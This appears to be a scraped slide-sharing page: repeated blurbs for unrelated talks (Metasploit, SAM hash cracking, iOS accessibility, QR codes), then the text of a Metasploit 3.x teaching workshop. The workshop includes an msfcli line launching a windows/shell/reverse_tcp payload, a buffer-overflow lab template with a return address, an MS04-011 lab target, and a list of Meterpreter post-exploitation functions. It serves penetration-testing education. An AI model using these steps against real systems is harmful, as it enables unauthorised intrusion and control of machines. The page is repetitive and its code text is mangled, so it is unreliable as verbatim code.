This document provides an overview of the Metasploit exploitation framework. It discusses Metasploit's structure and components, including modules, plugins, Rex library, and Framework Core classes. It describes the main interfaces for using Metasploit, including msfconsole, msfcli, msfweb, and msfgui. It also covers using Metasploit as a user, developer, and expert, including automation, Metasploitable, and the powerful Metasploit payload known as Metapreter.
Metasploit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world’s largest database of public, tested exploits.
Anonymous club of BMSCE, Talk and Demo on exploits on the Metasploit Framework and building Trojans using Msfvenom . By Siddharth.K (tech Head of anonymous club BMSCE)
Metasploit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world’s largest database of public, tested exploits.
Anonymous club of BMSCE, Talk and Demo on exploits on the Metasploit Framework and building Trojans using Msfvenom . By Siddharth.K (tech Head of anonymous club BMSCE)
Introduction to metasploit that we presented to the 4th year compsci students at Rhodes university.Covering the basic functionality of metasploit, and penetration testing.
The practical section that Etienne made (with Ponies) will come soon.
Armitage developed by Raphael mudge a gui format for metasploit framework for pentesr and security researcher,here u can manage as also prevent the cyber attack.this project means for educational purpose only.do not use as crime
Dumping and Cracking SAM Hashes to Extract Plaintext PasswordsVishal Kumar
This Lab will show you how to dump the Windows protected password storage SAM file using the tool pwdump7 and then crack the hash with an hash cracker tool that is Ophcrack and extract the plain-text password.
Privileges Escalation by Exploiting Client-Side Vulnerabilities Using MetasploitVishal Kumar
This Document will show you how get the privileges through exploiting the vulnerabilities using the Metasploit in Kali Linux. this will help a pen-tester to examine the security level of a system.
This is a walkthrough on exploiting a vulnerability within the password parameter allowing the memory buffer to be overrun and a shell gained as a result
Auditing System Password Using L0phtcrackVishal Kumar
The objective of this presentation is to help peoples to learn how to use L0htCrack tool to attain and crack the user password from any Windows Machine.
This presentation for the Accessibility Camp Bay Area introduces the new accessibility features of iOS7 and how they can be used for mobile developers. It also highlights key elements of the iOS 7.1 release that can affect accessibility. This is similar to a presentation I gave at Mobile+Web conference,http://www.slideshare.net/7mary4/ios7-accessibilitypdf, but doesn't need to introduce accessibility. The presentation is also meant to be more conversational.
Introduction to metasploit that we presented to the 4th year compsci students at Rhodes university.Covering the basic functionality of metasploit, and penetration testing.
The practical section that Etienne made (with Ponies) will come soon.
Armitage developed by Raphael mudge a gui format for metasploit framework for pentesr and security researcher,here u can manage as also prevent the cyber attack.this project means for educational purpose only.do not use as crime
Dumping and Cracking SAM Hashes to Extract Plaintext PasswordsVishal Kumar
This Lab will show you how to dump the Windows protected password storage SAM file using the tool pwdump7 and then crack the hash with an hash cracker tool that is Ophcrack and extract the plain-text password.
Privileges Escalation by Exploiting Client-Side Vulnerabilities Using MetasploitVishal Kumar
This Document will show you how get the privileges through exploiting the vulnerabilities using the Metasploit in Kali Linux. this will help a pen-tester to examine the security level of a system.
This is a walkthrough on exploiting a vulnerability within the password parameter allowing the memory buffer to be overrun and a shell gained as a result
Auditing System Password Using L0phtcrackVishal Kumar
The objective of this presentation is to help peoples to learn how to use L0htCrack tool to attain and crack the user password from any Windows Machine.
This presentation for the Accessibility Camp Bay Area introduces the new accessibility features of iOS7 and how they can be used for mobile developers. It also highlights key elements of the iOS 7.1 release that can affect accessibility. This is similar to a presentation I gave at Mobile+Web conference,http://www.slideshare.net/7mary4/ios7-accessibilitypdf, but doesn't need to introduce accessibility. The presentation is also meant to be more conversational.
Informationssicherheit im ÜbersetzungsprozessHans Pich
Die Frage nach Informationssicherheit wird spätestens seit der NSA-Affäre auch in Unternehmen zunehmend öfter gestellt. Im Vortrag werden die sich hieraus ergebenden Anforderungen für Übersetzungsdienstleister und ihre Auftraggeber anhand der Vorgaben der ISO 27001 vorgestellt. Neben den formalen Anforderungen im Bereich der Prozessgestaltung, Aspekten der physischen Sicherheitseinrichtungen und der IT werden auch die speziellen Besonderheiten beim Einsatz von Freelancern in gesicherten Prozessen diskutiert und praxisnahe Lösungsansätze aufgezeigt. Weitere Informationen unter www.rws-group.de/de/uebersetzung/rws-secure-translations/
Static PIE, How and Why - Metasploit's new POSIX payload: MettleBrent Cook
This talk discusses methods for building and injecting position-independent payloads into ELF processes. It also introduces Metasploit's new POSIX payload 'mettle' and outlines goals and future directions for Unix and Linux exploitation with Metasploit.
Como foi o Webinar?
Rafael apresentou a ferramenta, assim como explicou um pouco sobre sua arquitetura e suas principais funcionalidades. Rafael falou também dos próximos cursos da Academia Clavis: Metasploit Framework, Análise Forense Computacional e Teste de Invasão em Redes e Sistemas EAD.
http://www.blog.clavis.com.br/
Usage guide on using Metasploit auxiliary modules for information gathering. Some modules are used as examples to show functionality. The need for cyber investigators are booming and the tools available to perform investigations already exist, in most circumstances. While the majority of tools are open source, paid applications exist as well.
Wireless technology is inherently insecure in general, however this presentation details some unconventional attacks that have been around for years but are still incredibly effective. Discussing the basics of AP cloning, abusing captive portals, and more.
Mitigating overflows using defense in-depth. What can your compiler do for you?Javier Tallón
Defense-in-depth is based on the principle that, while no security is perfect, the presence of many independent layers of defense will geometrically increase an attacker's difficulty in breaking through the walls and slowing them down to the point where the effort to carry out an attack is not worthwhile. Each layer multiplies the effects of the previous layer. If the outer wall deters 90% of attacks, and the inner walls deter 90% of attacks, then in combination they deter 99% of attacks. Defense-in-depth defense techniques place core assets behind varied and individually effective layers of security, each of which must be circumvented for an attack to succeed.
There are many options provided by your compiler that can help you mitigate known attacks such as buffer overflow without touching a single line of code. In this presentation, we will take a historical look at the mitigations proposed over time by cybersecurity researchers, and how they have been violated, forcing the development of new and ingenious countermeasures.
Valgrind is a GPL'd system for debugging and profiling Linux programs. With Valgrind's tool suite you can automatically detect many memory management and threading bugs, avoiding hours of frustrating bug-hunting, making your programs more stable. You can also perform detailed profiling to help speed up your programs.
The Attached slide was presented at Null Open Security/OWAP/G4H combined community event, the document shared here is a representation of Independent study on usage of Metasploit on purpose built vulnerable machine Metasploitable3. With New attack vectors such as Elastic Search API and Jenkins servers -21/01/2017
Contains
1. Introduction to Metasploit (why metasploit?)
2. Demo Setup and talked on how to- Using Metasploitable3
3. Networking with VirtualBox for personal lab
4. Auxiliary Modules (Scanners and Servers ) - Demo of snmp_enum
5. Exploit Module (searching exploits)
6. Payload types
7. Exploit Demo 1 - /exploit/multi/elasticsearch/script_mvel_rce
8. Exploit Demo 2 -
/exploit/multi/http/jenkins_script_console
Introduction to metasploit framework
01.History of metasploit
02.Metasploit Design and architecture
03.Metasploit Editions
04.Metasploit Interface
05.Basic commands and foot-printing modules
[Defcon24] Introduction to the Witchcraft Compiler CollectionMoabi.com
With this presentation, we take a new approach to reverse engineering. Instead of attempting to decompile code, we seek to undo the work of the linker and produce relocatable files, the typical output of a compiler. The main benefit of the later technique over the former being that it does work. Once achieved universal code ‘reuse’ by relinking those relocatable objects as arbitrary shared libraries, we'll create a form of binary reflection, add scripting capabilities and in memory debugging using a JIT compiler, to attain automated API prototyping and annotation, which, we will argue, constitutes a primary form of binary code self awareness. Finally, we'll see how abusing the dynamic linker internals shall elegantly solve a number of complex tasks for us, such as calling a given function within a binary without having to craft a valid input to reach it.
The applications in terms of vulnerability exploitation, functional testing, static analysis validation and more generally computer wizardry being tremendous, we'll have fun demoing some new exploits in real life applications, and commit public program profanity, such as turning PEs into ELFs, functional scripting of sshd in memory, stealing crypto routines without even disassembling them, among other things that were never supposed to work. All the above techniques have been implemented into the Wichcraft Compiler Collection, to be released as proper open source software (MIT/BSD-2 licenses) exclusively at DEF CON 24.
Jonathan Brossard is a computer whisperer from France, although he's been living in Brazil, India, Australia and now lives in San Francisco. For his first conference at DEF CON 16, he hacked Microsoft Bitlocker, McAffee Endpoint and a fair number of BIOS Firmwares. During his second presentation at DEF CON 20, he presented Rakshasa, a BIOS malware based on open source software, the MIT Technology review labeled "incurable and undetectable".
This year will be his third DEF CON ... Endrazine is also known in the community for having run the Hackito Ergo Sum and NoSuchCon conferences in France, participating to the Shakacon Program Committee in Hawaii, and authoring a number of exploits over the past decade. Including the first remote Windows 10 exploit and several hardcore reverse engineering tools and whitepapers. Jonathan is part of the team behind MOABI.COM, and acts as the Principal Engineer of Product Security at Salesforce.
Twitter: @endrazine
Facebook: toucansystem
https://moabi.com
5/13/13 presentation to Austin DevOps Meetup Group, describing our system for deploying 15 websites and supporting services in multiple languages to bare redhat 6 VMs. All system-wide software is installed using RPMs, and all application software is installed using GIT or Tarball.
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
Welocme to ViralQR, your best QR code generator.ViralQR
Welcome to ViralQR, your best QR code generator available on the market!
At ViralQR, we design static and dynamic QR codes. Our mission is to make business operations easier and customer engagement more powerful through the use of QR technology. Be it a small-scale business or a huge enterprise, our easy-to-use platform provides multiple choices that can be tailored according to your company's branding and marketing strategies.
Our Vision
We are here to make the process of creating QR codes easy and smooth, thus enhancing customer interaction and making business more fluid. We very strongly believe in the ability of QR codes to change the world for businesses in their interaction with customers and are set on making that technology accessible and usable far and wide.
Our Achievements
Ever since its inception, we have successfully served many clients by offering QR codes in their marketing, service delivery, and collection of feedback across various industries. Our platform has been recognized for its ease of use and amazing features, which helped a business to make QR codes.
Our Services
At ViralQR, here is a comprehensive suite of services that caters to your very needs:
Static QR Codes: Create free static QR codes. These QR codes are able to store significant information such as URLs, vCards, plain text, emails and SMS, Wi-Fi credentials, and Bitcoin addresses.
Dynamic QR codes: These also have all the advanced features but are subscription-based. They can directly link to PDF files, images, micro-landing pages, social accounts, review forms, business pages, and applications. In addition, they can be branded with CTAs, frames, patterns, colors, and logos to enhance your branding.
Pricing and Packages
Additionally, there is a 14-day free offer to ViralQR, which is an exceptional opportunity for new users to take a feel of this platform. One can easily subscribe from there and experience the full dynamic of using QR codes. The subscription plans are not only meant for business; they are priced very flexibly so that literally every business could afford to benefit from our service.
Why choose us?
ViralQR will provide services for marketing, advertising, catering, retail, and the like. The QR codes can be posted on fliers, packaging, merchandise, and banners, as well as to substitute for cash and cards in a restaurant or coffee shop. With QR codes integrated into your business, improve customer engagement and streamline operations.
Comprehensive Analytics
Subscribers of ViralQR receive detailed analytics and tracking tools in light of having a view of the core values of QR code performance. Our analytics dashboard shows aggregate views and unique views, as well as detailed information about each impression, including time, device, browser, and estimated location by city and country.
So, thank you for choosing ViralQR; we have an offer of nothing but the best in terms of QR code services to meet business diversity!
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
2. Exploitation Frameworks:
Metasploit 3.x Workshop
Steven McGrath
1
What to Accomplish
Understanding Metasploit as a user
Understanding the basics of Ruby
Understanding Metasploit as a developer
Understanding Metasploit as a expert
2
What this is...
To help better an understanding of Metasploit
To learn how to use the framework in exploit research
To learn how to use Metasploit in pen-testing.
3
3. What this is NOT...
l33t h@x0r class
Reasons why Metasploit is better than everything
else...it isn’t
h@x0ring this network.
4
You should have...
Backtrack Image (supplied)
VMWare Player/Workstation/Fusion (supplied)
A laptop to run all of this on (NOT supplied)
5
Starting off
What is Metasploit?
How is it used?
What are other tools?
What benefits does Metasploit have?
6
4. What is it?
Metasploit is an exploitation framework, NOT a
vulnerability scanner.
7
How is it used?
Primarily an aide in exploitation research.
Secondarily used in pen-testing.
8
What are other tools?
CORE Impact
CANVAS
9
5. Benefits?
Price
CORE Impact = $25,000 USD a year
CANVAS = $1244 USD + Support
Flexibility
Open Source = More Options
10
Downsides?
Flexibility
Most Metasploit payloads are windows specific.
Completeness
The framework is under active development,
however there are still holes in the framework
that need to be addressed.
11
Metasploit as a User
12
6. What to cover?
Control Interfaces
Basic usage
13
msfconsole
Primary interface into Metasploit
Shell-like (with readline)
Will run external commands
Dynamic interaction with Metasploit
Automation capable
14
msfconsole
Automation?
Automation is achieved through resource files. They
contain a list of commands that msfconsole should
run as if the user had inputted them and startup of
the console.
15
7. msfconsole
Configuration files?
msfconsole by default has the ability to store per-
user configuration data. This is typically stored in
~/.msf3 by default.
16
msfconsole
set unset
load unload
use show
save sessions
jobs route
Basic Commands:
info irb
loadpath back
check exploit
run route
17
msfconsole - set/unset
set - Sets a variable to the specified value. Also can
show a list of variables that can be set when run alone.
unset - Will “unset” or remove the value from a variable
or series of variables.
setg - Global equivilent of set.
unsetg - Global equinilent of unset.
NOTE: local variables will override globals.
18
8. msfconsole - load/unload
load - Will load a plugin from the framework. You can
also pass values to optional variables at load.
unload - Will unload a plugin.
loadpath - Adds a module path for the framework to
search and load modules. Useful for custom modules.
19
msfconsole - show/use
show - Will display lists of modules: auxilary, exploits,
payloads, encoders, and nops.
use - Use changes your context within the framework.
back - Returns you to the global context.
20
msfconsole - save
save - Saves your current state (e.g. current module
and set variables)
21
9. msfconsole - sessions
sessions - Session interations...
-i - Interacts with the specified session.
-l - Lists the active sessions.
22
msfconsole - jobs
jobs - Will display information in reguards to
backgrounded jobs (typically client-side exploits)
-l - List the active jobs.
-k - Kills the specified job.
23
msfconsole - route
route - Allows you to interact with the framework
routing table (useful in “pivoting”).
24
10. msfconsole - info
info - Will display information about the specified
module(s).
25
msfconsole - irb
irb - Provides an interactive ruby shell into the
framework. This is useful for live scripting and/or
modification to code.
26
msfconsole - check/exploit
check - Checks to see if the specified target is
vulnerable to an exploit.
exploit - Will launch an exploit on the specified target.
run - Will launch an auxiliary module against the
specified target(s).
NOTE: Normally checks are not required to exploit a
target.
27
11. msfconsole - rcheck/rexploit
rcheck - Will first reload the module from disk before
running the check.
rexploit - Same as rcheck, but will launch the actual
exploit.
28
msfcli
Commandline Interface
Arguments are passed to tell Metasploit what to do
Traditionally used for automation
29
msfcli
Example:
./msfcli exploit/example
RHOST=192.168.1.100
LHOST=192.168.1.50
PAYLOAD=windows/shell/reverse_tcp E
30
12. msfcli
./msfcli -h for more info
31
msfweb
Web Interface to Metasploit
Ruby on Rails application
The primary interface for Windows
32
33
13. 34
msfgui
Still under HEAVY development
GTK GUI to Metasploit
Attempt to make Metasploit more like CANVAS and
CORE from the User’s standpoint
35
msfd
Network daemon interface.
Listens on port 55554 for telnet connections.
Useful for sharing a running framework without the
hassle of screen.
Pivot points
Exploits
Sessions
36
14. Before we continue...
From this point on we will be assuming msfconsole
37
Exploit Me!
Target: 10.0.0.5
Exploit Module to use: windows/smb/ms04_011_lsass
Payload: Anything you choose!
Feel free to ask your classmates and myself :)
38
Metasploit as a Developer
39
15. Metasploit as a Developer
This will be a hands-on workshop.
You WILL be writing your own exploit before we leave.
Due to constraints, we will be focusing viewing a few
example modules for code examples before the
workshop portion.
40
Starting off...
Getting to know Ruby
A general understanding of how Metasploit 3.x is built
Example Code
Lab
41
Getting to know Ruby
Interpreted, not compiled.
Object Oriented by design
The Red-headed stepchild of Python, Perl, and
SmallTalk
42
16. Getting to know Ruby
Hello World:
#!/usr/bin/env ruby
# This is the hello world
Application
var1=quot;Hello World!quot;
print quot;n#{var1}nquot;
print var1, quot;nquot;
43
Getting to know Ruby - Lab
Extend the Basic TCP Server in your materials to
respond to any input given.
44
Getting to know Ruby - Lab
require 'socket'
port = 44455
host = localhost
server = TCPServer.new(host,port)
while(session = server.accept)
while !session.eof?
session.puts quot;R: #{session.gets}quot;
end
end
45
17. Metasploit’s Structure - Dirs
data - Data files for the framework
documentation - Examples, Guides, etc.
external - Non-framework software
lib - Framework Libraries
modules - Module root for the framework
plugins - Plugin root for the framework
scripts - Script root for the framework
tools - Development tools
46
Metasploit’s Structure - Dirs
modules
auxiliary - Auxiliary module root
encoders - Encoder module root
exploits - Exploit module root
nops - NOP module root
payloads - Payload module root
47
Metasploit’s Structure
What is the difference between an exploit and an
auxiliary module?
Exploit modules will actually deliver a payload
Auxiliary modules cover anything else
48
18. Metasploit’s Structure
49
Rex
Ruby Exploitation Library
Derived from Metasploit 2’s Pex libraries
Located in lib/rex
Rex is the base that most of the framework builds upon
50
Rex Subsystems
Architectures Encoding Exploitation
I/O Logging Nops
Non-Protocol Polymorphic
Payload
Parsers Blocks
Post-Exploit
Protocols Services
Clients
Services Sockets Text Manipulation
User Interface
51
19. Framework Core
Core interface into the framework
Handles the core aspects of the framework
Module interaction (loading, unloading, etc.)
Exploitation handling
Plugins
Sessions
Located under lib/msf/core
52
Framework Core Classes
Framework Datastore EncodedPayload
EventDispatcher ExploitDriver
Module
Auxiliary
Encoder
Handler OptionContainer
Exploit
Nop
Payload Plugin Session
53
Framework Base
Thin interaction layer between Framework Core and
Modules, Plugins, and User Interfaces
54
20. Digging In...
Now that we have a basic understanding of how the
framework is built, it’s time to dig into the plugins and
modules themselves...
55
Metasploit Plugins
Plugins extend the framework dynamically.
Plugins are NOT modules.
All of the User Interfaces are essentially plugins to the
framework.
56
Metasploit Plugins
Example Plugins
Database
msfd Threading
support
Session Session
IPS filters
hooks taggers
57
21. Metasploit Plugins
module Msf
class Plugin::Example < Msf::Plugin
module ExampleExtension
def example_ext
quot;This is a Testquot;
end
end
def initialize(framework, options)
framework.extend(ExampleExtension)
end
end
end 58
Framework Modules
Modules are used for specific uses within the
framework.
Modules use an extensible, well-defined interface for
interaction within the framework.
All modules inherit from Msf::Module.
59
Metasploit Modules
Common Hash Keys Name String
Description String
Version String
Author Array
Arch Array
Platform PlatformList
Ref Array
License String
60
22. Example Module
require 'msf/core'
module Msf
class Auxiliary::Scanner::HTTPScanner < Msf::Auxiliary
include Exploit::Remote::Tcp
include Auxiliary::Scanner
def initialize
super(
'Name' => 'HTTP Scanner',
'Author' => 'Maniac <maniac@chigeek.com>',
'Description' => %q{Scans for HTTP Servers in RHOSTS.}
)
register_options(
[
Opt::RPORT(80),
OptString.new(quot;SENDSTRINGquot;, [ false,
quot;String to send if port is openquot;, quot;HEAD / HTTP/1.0nnquot; ])
], self.class )
end
61
Example Module
def run_host(ip)
connect
sock.put(datastore['SENDSTRING'])
data = sock.get_once
print_status(ip + quot;nReceived: quot; + data + quot;nquot;)
disconnect
end
end
end
62
Framework Modules - Lab
Use the Lab module template and extend it to buffer
overflow with the following information
Host: 10.0.0.5
Return: 0xbfbfed20
76 Bytes + [target.ret].pack('V') + payload.encode
63
23. Metasploit as an Expert
64
Tasty Good Stuff!
Automation
Metaterpreter
65
Attack Automation
66
24. Attack Automation
Attack automation can happen in a number of different
ways:
Psudo-Automated
Full Automation
67
Psudo-Automation
Resource Files for msfconsole.
Custom shell scripts that interact with msfcli.
Custom auxiliary modules.
db_autopwn
Existing Nessus Data
Existing Nmap Data
68
Full Automation
db_autopwn
db_nmap - Will scan a network with nmap and then
exploit based on what it put into the database.
69
25. Metaterpreter
70
Metaterpreter
Extensible - extensions can be written to enhance
metaterpreter.
Powerful - Flexible protocol and channelized
communication.
Stealthy - No disk access and no new process.
In Memory DLL injection
71
Metaterpreter - OMGWTF!
This is how it works:
1.Metasploit sends first stage payload.
2.Payload talks back to Metasploit.
3.Metasploit sends second stage containing a DLL
injection payload.
4.Metasploit sends the metaterpreter server DLL
5.DLL injection payload loads the server DLL in
memory
6.Metaterpreter client and server communicate over
the establiched channels.
72
26. Metaterpreter - UI
client.ui
Method Description
disable_keyboard Disables the Keyboard
disable_mouse Disables the Mouse
enable_keyboard Enables the Keyboard
enable_mouse Enables the Mouse
idle_time Returns idle time in seconds
73
Metaterpreter - Filesystem
client.fs.dir
Method Description
chdir(path) Change Directories
delete(path) Delete Directory
download(dst, src, resursive Download Content to Local
entries(path) Show Contents of Directory
getwd Get the Working Directory
mkdir(path) Make Directory
upload(dst, src, recursive) Upload Content to Host
74
Metaterpreter - Filesystem
client.fs.file
Method Description
download(dest, files) Downloads Files to Local
expand_path(path) Expands Env Strings in Path
stat(path) Returns info on file
upload(dest, files) Uploads Files to Remote
75
27. Metaterpreter - Filesystem
client.fs.file.new
Method Description
(file, [r,w]) Opens file
close Closes file
read(length) Reads X bytes from file
seek(offset, whence) Seeks to offset in file
write(buffer) Writes buffer to the file
76
Metaterpreter - Networking
client.net.config
Method Description
add_route(s, n, g) Adds route
each_interface Displays interfaces
each_route Displays routes
get_interfaces Returns array of interfaces
get_routes Returns array of routing table
remove_route(s, n, g) Removes route
77
Metaterpreter - Config
client.sys.config
Method Description
getuid Returns Process UID
revert_to_self Calls RevertToSelf
Returns System Name and
sysinfo
Host Information
78
28. Metaterpreter - Power
client.sys.power
Method Description
reboot(reason) Reboots Host
shutdown(force, reason) Shuts down Host
79
Metaterpreter - Processes
client.sys.process
Method Description
each_process Displays running processes
execute(path, args, opts) Executes binary
getpid Returns current process
kill(pid) Kills process
processes Returns array of processes
open(pid, perms) Opens process
80
Metaterpreter - Registry
client.sys.registry
Method Description
close_key(hk) Closes an open key
create_key(hk, bk, perm) Creates new key
delete_key(hk, bk, recursive) Deletes key
delete_value(hk, name) Deletes reg value
enum_key(hk) Returns array of subkeys
open_key(hk, bk, perm) Opens a reg key
query_value(hk, name) Returns reg value
set_value(hk, name, type, val) Sets reg value 81
31. maniac_scanner.rb 2007-09-04
require 'msf/core'
module Msf
class Auxiliary::Scanner::ExampleScanner < Msf::Auxiliary
# Exploit mixins should be added first
include Exploit::Remote::Tcp
# Scanner mixin should be included last
include Auxiliary::Scanner
def initialize
super(
'Name' => 'Generic Scanner Template',
'Author' => 'Maniac <maniac@chigeek.com>',
'Description' => %q{
Connect to every host specified in the RHOSTS
network range, send a probe, read a response, and
print that response to the screen.
}
)
register_options(
[
# Specify the predefined RPORT option
Opt::RPORT(25),
# Specify a new option containing the string to send to the server
OptString.new(quot;SENDSTRINGquot;, [ false, quot;The string to sendquot;, quot;HEAD /
HTTP/1.0nnquot; ])
], self.class )
end
# Work with a single IP address at a time
def run_host(ip)
# Call the connect() method provided by the TCP mixin
# This is equivalent to connect()
connect
- 1/2 -
32. maniac_scanner.rb 2007-09-04
sock.put(datastore['SENDSTRING'])
data = sock.get_once
print_status(ip + quot; Received: quot; + data)
# Call the disconnect() method provided by the TCP mixin
# This is equivalent to disconnect()
disconnect
end
end
end
- 2/2 -
33. 2007-09-05
#!/usr/bin/env ruby
##### Example TCP Server Lab #####
# In this lab you will be modifying the
# code to return any input to the client.
require 'socket'
# Lets define the port and host.
port = 44455
host = localhost
# Create a new server connection.
server = TCPServer.new(host,port)
# Lets stay active as long as we are
# accepting connections.
while(session = server.accept)
# As long as we do not terminate
# our client, lets stay within this
# context.
while !session.eof?
# Something should go here ;)
end
end
- 1/1 -